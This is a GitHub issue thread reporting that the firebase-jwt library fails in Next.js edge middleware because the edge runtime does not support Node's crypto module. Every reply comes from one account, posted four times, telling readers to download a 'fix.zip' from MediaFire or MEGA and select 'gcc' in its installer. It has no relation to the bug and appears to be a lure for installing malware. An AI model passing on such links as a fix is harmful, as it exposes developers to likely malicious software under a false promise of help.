### ISSUE TITLE
Error: The edge runtime does not support Node.js 'crypto' module.

### ISSUE THREAD

**Issue by Adityapanther** [presswink/firebase-jwt#10]
we are getting error in nextjs middleware `Error: The edge runtime does not support Node.js 'crypto' module.`

**current Behaviour**
it's failing in nextjs middleware

**expected Behaviour**
it's work in next js

**ENV**
1) node version - 22.4.0
2) nextjs version - 15.x.x
3) Reactjs - 18.x.x

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
